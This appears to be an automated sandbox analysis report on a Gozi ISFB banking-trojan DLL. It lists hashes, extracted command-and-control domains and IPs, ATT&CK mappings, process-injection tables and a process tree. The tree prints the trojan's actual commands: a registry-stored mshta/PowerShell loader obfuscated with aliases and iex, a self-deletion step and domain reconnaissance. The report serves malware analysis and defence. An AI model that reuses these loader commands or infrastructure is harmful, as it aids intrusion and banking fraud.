gozi_ifsb | f3ac2a9eff98276ff2c1478f897721d910ef5f706ad341c7eabd627e71d2072c

Analysis

max time kernel
150s
max time network
152s
platform
windows10_x64
resource
win10-en-20211208
submitted
14-12-2021 09:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61b8636067f2b.tar.dll
Size

1.7MB
MD5

21a543254be9ed87668a1e9b282380ee
SHA1

60d0d34e80ad511f23a5ff8d9f5794bb5bf679f4
SHA256

f3ac2a9eff98276ff2c1478f897721d910ef5f706ad341c7eabd627e71d2072c
SHA512

f3121b6ad17fb90edf0389642341ec2831902b1acc1241265fa2f1fee7b76359f3da919f2bfc82dcb84eaca2d1230219e0590fd78b4959ba62ef5293e2db5420

Score

10^/10

gozi_ifsb 8899 banker trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

8899

microsoft.com/windowsdisabler

windows.update3.com

berukoneru.website

gerukoneru.website

fortunarah.com

assets.msn.com

http://microsoft.com

79.110.52.217

79.110.52.215

45.9.20.190

45.9.20.128

aerukoneru.site

serukoneru.site

yerukoneru.site

karfaganda.com

Attributes

base_path
/tire/
build
260222
dga_season
10
exe_type
loader
extension
.eta
server_id
12

rsa_pubkey.plain

serpent.plain

rsa_pubkey.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2424 set thread context of 3032	2424	powershell.exe	Explorer.EXE
PID 3032 set thread context of 3572	3032	Explorer.EXE	RuntimeBroker.exe
PID 3032 set thread context of 2836	3032	Explorer.EXE	cmd.exe
PID 2836 set thread context of 4772	2836	cmd.exe	PING.EXE
PID 3032 set thread context of 4996	3032	Explorer.EXE	WinMail.exe
PID 3032 set thread context of 2964	3032	Explorer.EXE	WinMail.exe
PID 3032 set thread context of 2476	3032	Explorer.EXE	cmd.exe
PID 3032 set thread context of 1252	3032	Explorer.EXE	cmd.exe

Drops file in Windows directory 1 IoCs

Processes:

regsvr32.exe

description ioc process

File opened for modification C:\Windows\ regsvr32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4776 3548 WerFault.exe regsvr32.exe
Discovers systems in the same network 1 TTPs 3 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exenet.exe

pid process

4516 net.exe
2516 net.exe
2488 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

3744 tasklist.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

4592 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4576 systeminfo.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4772 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

4772 PING.EXE

description	ioc	process
File opened for modification	C:\Windows\	regsvr32.exe

pid	pid_target	process	target process
4776	3548	WerFault.exe	regsvr32.exe

pid	process
4516	net.exe
2516	net.exe
2488	net.exe

pid	process
3744	tasklist.exe

pid	process
4592	ipconfig.exe

pid	process
4576	systeminfo.exe

pid	process
4772	PING.EXE

pid	process
4772	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

regsvr32.exepowershell.exeExplorer.EXEWerFault.exe

pid	process
3548	regsvr32.exe
3548	regsvr32.exe
2424	powershell.exe
2424	powershell.exe
2424	powershell.exe
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
4776	WerFault.exe
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3032 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2424 powershell.exe
3032 Explorer.EXE
3032 Explorer.EXE
2836 cmd.exe
3032 Explorer.EXE
3032 Explorer.EXE
3032 Explorer.EXE
3032 Explorer.EXE

pid	process
3032	Explorer.EXE

pid	process
2424	powershell.exe
3032	Explorer.EXE
3032	Explorer.EXE
2836	cmd.exe
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exeExplorer.EXEWerFault.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeRestorePrivilege	4776	WerFault.exe
Token: SeBackupPrivilege	4776	WerFault.exe
Token: SeDebugPrivilege	4776	WerFault.exe
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeDebugPrivilege	3744	tasklist.exe
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3032 Explorer.EXE

pid	process
3032	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 3652 wrote to memory of 3548	3652	regsvr32.exe	regsvr32.exe
PID 3652 wrote to memory of 3548	3652	regsvr32.exe	regsvr32.exe
PID 3652 wrote to memory of 3548	3652	regsvr32.exe	regsvr32.exe
PID 4324 wrote to memory of 2424	4324	mshta.exe	powershell.exe
PID 4324 wrote to memory of 2424	4324	mshta.exe	powershell.exe
PID 2424 wrote to memory of 1452	2424	powershell.exe	csc.exe
PID 2424 wrote to memory of 1452	2424	powershell.exe	csc.exe
PID 1452 wrote to memory of 1728	1452	csc.exe	cvtres.exe
PID 1452 wrote to memory of 1728	1452	csc.exe	cvtres.exe
PID 2424 wrote to memory of 1920	2424	powershell.exe	csc.exe
PID 2424 wrote to memory of 1920	2424	powershell.exe	csc.exe
PID 1920 wrote to memory of 2108	1920	csc.exe	cvtres.exe
PID 1920 wrote to memory of 2108	1920	csc.exe	cvtres.exe
PID 2424 wrote to memory of 3032	2424	powershell.exe	Explorer.EXE
PID 2424 wrote to memory of 3032	2424	powershell.exe	Explorer.EXE
PID 2424 wrote to memory of 3032	2424	powershell.exe	Explorer.EXE
PID 2424 wrote to memory of 3032	2424	powershell.exe	Explorer.EXE
PID 3032 wrote to memory of 3572	3032	Explorer.EXE	RuntimeBroker.exe
PID 3032 wrote to memory of 3572	3032	Explorer.EXE	RuntimeBroker.exe
PID 3032 wrote to memory of 3572	3032	Explorer.EXE	RuntimeBroker.exe
PID 3032 wrote to memory of 3572	3032	Explorer.EXE	RuntimeBroker.exe
PID 3032 wrote to memory of 2836	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2836	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2836	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2836	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2836	3032	Explorer.EXE	cmd.exe
PID 2836 wrote to memory of 4772	2836	cmd.exe	PING.EXE
PID 2836 wrote to memory of 4772	2836	cmd.exe	PING.EXE
PID 2836 wrote to memory of 4772	2836	cmd.exe	PING.EXE
PID 2836 wrote to memory of 4772	2836	cmd.exe	PING.EXE
PID 2836 wrote to memory of 4772	2836	cmd.exe	PING.EXE
PID 3032 wrote to memory of 4936	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 4936	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2316	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2316	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 4996	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 4996	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 2964	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 2964	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 4996	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 2964	3032	Explorer.EXE	WinMail.exe
PID 2316 wrote to memory of 4576	2316	cmd.exe	systeminfo.exe
PID 2316 wrote to memory of 4576	2316	cmd.exe	systeminfo.exe
PID 4936 wrote to memory of 4592	4936	cmd.exe	ipconfig.exe
PID 4936 wrote to memory of 4592	4936	cmd.exe	ipconfig.exe
PID 3032 wrote to memory of 4996	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 4996	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 2964	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 2964	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 1252	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 1252	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 1252	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 1252	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2476	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2476	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2476	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2476	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 716	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 716	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3660	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3660	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 2476	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 1252	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 1252	3032	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3032

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\61b8636067f2b.tar.dll
2⤵
- Suspicious use of WriteProcessMemory
PID:3652

C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\61b8636067f2b.tar.dll
3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 1380
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wvi0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wvi0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EC96820B-5BA5-FE9A-45E0-BF1249146366\\\PictureSettings'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:4324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name lgmimpdh -value gp; new-alias -name dyoohwmybk -value iex; dyoohwmybk ([System.Text.Encoding]::ASCII.GetString((lgmimpdh "HKCU:Software\AppDataLow\Software\Microsoft\EC96820B-5BA5-FE9A-45E0-BF1249146366").ClassComputer))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\puhxd2wj\puhxd2wj.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1452

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7ED1.tmp" "c:\Users\Admin\AppData\Local\Temp\puhxd2wj\CSCBDCA541BCC9940BE89BCB6A24793A7D0.TMP"
5⤵
PID:1728

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p5mdxson\p5mdxson.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F9C.tmp" "c:\Users\Admin\AppData\Local\Temp\p5mdxson\CSC24FAD0586BD45FF8B6A259014D993BC.TMP"
5⤵
PID:2108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61b8636067f2b.tar.dll"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2836

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4772

C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\system32\systeminfo.exe
systeminfo.exe
3⤵
- Gathers system information
PID:4576

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:2964

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:4996

C:\Windows\system32\cmd.exe
cmd /C "ipconfig /all >> C:\Users\Admin\AppData\Local\Temp\1B7B.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:4936

C:\Windows\system32\ipconfig.exe
ipconfig /all
3⤵
- Gathers network information
PID:4592

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1252

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B7B.bin1"
2⤵
PID:716

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2476

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\1B7B.bin1 > C:\Users\Admin\AppData\Local\Temp\1B7B.bin & del C:\Users\Admin\AppData\Local\Temp\1B7B.bin1"
2⤵
PID:3660

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:1068

C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:2004

C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:4516

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:3524

C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:2924

C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵
PID:1020

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:2292

C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:1864

C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:3276

C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:4428

C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵
PID:2096

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:3928

C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:3024

C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵
PID:3908

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:4092

C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:4408

C:\Windows\system32\net.exe
net config workstation
3⤵
PID:4312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
4⤵
PID:4416

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:3916

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:1044

C:\Windows\system32\nltest.exe
nltest /domain_trusts
3⤵
PID:1372

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:1036

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:1784

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
3⤵
PID:1452

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:2060

C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:1596

C:\Windows\system32\net.exe
net view /all /domain
3⤵
- Discovers systems in the same network
PID:2516

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:824

C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:1344

C:\Windows\system32\net.exe
net view /all
3⤵
- Discovers systems in the same network
PID:2488

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:396

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\1B3A.bin1 > C:\Users\Admin\AppData\Local\Temp\1B3A.bin & del C:\Users\Admin\AppData\Local\Temp\1B3A.bin1"
2⤵
PID:3904

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3572

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1B3A.bin
MD5
9db8d837aa2203396a4aa8d2c7fd9933

SHA1
02eea336d6989820005400554fe3456c456e0353

SHA256
5452df88aa0bc65aa3f048948b5a0729bfbb5f927880338c6b94f4f68765f072

SHA512
7594940efaab56c54a362d1fc6db907eeb8fb8fd3a6c633ba80cbe355eac511b35b6ce4c09e573cdcaf4b3f6d82a6f2cb1be985728814375e2a1540519f24bed

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
43e65336ab942ab11197432a0d955240

SHA1
fa26ef9ade6db478e1d00007d235ad3996e000d3

SHA256
452169b06f7cce37120eac911a1a9c95ba0f20af62a6c016d65db29cf307f8b7

SHA512
8cbf11428c76384d07c07c079175d0ed38aa25de03bf417f5bad78204a32eb6e1e00d7b7d6cd4f8e3364171f21bb2580fd87d5fc18871286805cd0568c9903c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
43e65336ab942ab11197432a0d955240

SHA1
fa26ef9ade6db478e1d00007d235ad3996e000d3

SHA256
452169b06f7cce37120eac911a1a9c95ba0f20af62a6c016d65db29cf307f8b7

SHA512
8cbf11428c76384d07c07c079175d0ed38aa25de03bf417f5bad78204a32eb6e1e00d7b7d6cd4f8e3364171f21bb2580fd87d5fc18871286805cd0568c9903c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
6feb5127589d665a27ab97576f326d77

SHA1
439e6fc6be04ec5474f48be22202a3f04767b6fa

SHA256
56588845c8433ced848c02a0550742ae28ada4b55eca0b771c9839276530ebfe

SHA512
3a14b598e1353c3ff259c4d0cc2156288e209f52738148cc6a7cda848c744e2153b83b7f97390fee0ae39a4c0a44ce77357aaeddfde7eb0d8aa396cca6c3f181

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
6feb5127589d665a27ab97576f326d77

SHA1
439e6fc6be04ec5474f48be22202a3f04767b6fa

SHA256
56588845c8433ced848c02a0550742ae28ada4b55eca0b771c9839276530ebfe

SHA512
3a14b598e1353c3ff259c4d0cc2156288e209f52738148cc6a7cda848c744e2153b83b7f97390fee0ae39a4c0a44ce77357aaeddfde7eb0d8aa396cca6c3f181

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
7ece7925eef1b0bf352dd1f35bf1deae

SHA1
0b0ef21a05ae232d69cff0151f57aaa2a588d0ee

SHA256
bf55791f53419cac904047f6f1bd7c992112f740539a177fcf22bb4c779db28f

SHA512
cad48473ed69befabc458ef8cb9ea3376f56670d4a5131e08a9d5307279d4d56ab40a8b88a13847c8492c39c789f721d13d6dc0dfd0f0adcad200fc974bcaabd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
7ece7925eef1b0bf352dd1f35bf1deae

SHA1
0b0ef21a05ae232d69cff0151f57aaa2a588d0ee

SHA256
bf55791f53419cac904047f6f1bd7c992112f740539a177fcf22bb4c779db28f

SHA512
cad48473ed69befabc458ef8cb9ea3376f56670d4a5131e08a9d5307279d4d56ab40a8b88a13847c8492c39c789f721d13d6dc0dfd0f0adcad200fc974bcaabd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
f40ea0115c6ab1a061ac6d24ae0e364b

SHA1
65a2092addfdfd3563afd085d1c6160a79887d7a

SHA256
db5450855cd836b708f1e535cdc0cc0cd3935b1376651d291309399ee0fc89ea

SHA512
19b7499998c1914f365a3a74876b071c250f59966c39aba0d1cd21ff1036700ef5f20e26ce950e7ca91771346aa4e00d1f51adb53dea16a17e8660f4e32b797a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
f40ea0115c6ab1a061ac6d24ae0e364b

SHA1
65a2092addfdfd3563afd085d1c6160a79887d7a

SHA256
db5450855cd836b708f1e535cdc0cc0cd3935b1376651d291309399ee0fc89ea

SHA512
19b7499998c1914f365a3a74876b071c250f59966c39aba0d1cd21ff1036700ef5f20e26ce950e7ca91771346aa4e00d1f51adb53dea16a17e8660f4e32b797a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
85d3aab4c74c492913bb230124d4432b

SHA1
72e866eab1c74238b13ff48528325c66db2d0dc8

SHA256
733d474bd248ab4bfc310da6ea9d1cc0568a356f68a6167d38c760bbcd329cf5

SHA512
ea3fcd948755ff914d60aeb7cea631b49853aa391996dc8582b61cb6a22a1689e86dc7b51a1c5014c0c6e7fcedd23cbd5966cc23efe774d6211e36a902d849c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
85d3aab4c74c492913bb230124d4432b

SHA1
72e866eab1c74238b13ff48528325c66db2d0dc8

SHA256
733d474bd248ab4bfc310da6ea9d1cc0568a356f68a6167d38c760bbcd329cf5

SHA512
ea3fcd948755ff914d60aeb7cea631b49853aa391996dc8582b61cb6a22a1689e86dc7b51a1c5014c0c6e7fcedd23cbd5966cc23efe774d6211e36a902d849c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
a7f23ce68394e934926cc892ce814ca3

SHA1
9817bfbac6a0853e81f929c15ea6f6591cc38f1a

SHA256
95c897926592fd678ba45e19c7df2517a875fad03f6430a2e99825338b85e14b

SHA512
3076564c8006a7d0192ace3c02119a411dede90a7f5275c43841011fe64a19fb5aa2932a86d42399edae3b1f25dbc7c3f81ff9050760d1719ae76d002cef17c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
a7f23ce68394e934926cc892ce814ca3

SHA1
9817bfbac6a0853e81f929c15ea6f6591cc38f1a

SHA256
95c897926592fd678ba45e19c7df2517a875fad03f6430a2e99825338b85e14b

SHA512
3076564c8006a7d0192ace3c02119a411dede90a7f5275c43841011fe64a19fb5aa2932a86d42399edae3b1f25dbc7c3f81ff9050760d1719ae76d002cef17c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
04f0eab4b05fa0964deadc41a14388b5

SHA1
e5472a832d329ccb86c7168b2af453118190c350

SHA256
4c9038312def72677a1794ad99ba1c6d20a865cc4c74ebd35290dd61d29b94ef

SHA512
457be3fe3bb544cc198363047ba2d7c97a8eac8313beb32202e736c6d8f2e04726a76f203561b1044b553d224316a23d0eb715aa9ab76710b251c03db7bd4862

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
04f0eab4b05fa0964deadc41a14388b5

SHA1
e5472a832d329ccb86c7168b2af453118190c350

SHA256
4c9038312def72677a1794ad99ba1c6d20a865cc4c74ebd35290dd61d29b94ef

SHA512
457be3fe3bb544cc198363047ba2d7c97a8eac8313beb32202e736c6d8f2e04726a76f203561b1044b553d224316a23d0eb715aa9ab76710b251c03db7bd4862

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
6a2914872f6bc3dc77b4a144c678ee6c

SHA1
7680236d2b68df039e8326ef528215ac3e68e07c

SHA256
22465d42e8bbf35ac092465769afb956f8f7c338105b6de93c8d7eec0dc6f003

SHA512
e0a2eacd8514de52619e0f7d173550a1968f937b90de591dd5c51904ffb567495e4a710419e192650f64cb44fd7ce52ef62baa3aab5182321e646333e57b6c2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B3A.bin1
MD5
ffc7a8b6e91bbbae90013bffb3929908

SHA1
c643d0182c55bd54e30d1d9e0ebf6cb719c80c45

SHA256
8a6b378c6d90847bfc6c5083fe20347bc2f67a64229b2f1dbff6114918fb9de4

SHA512
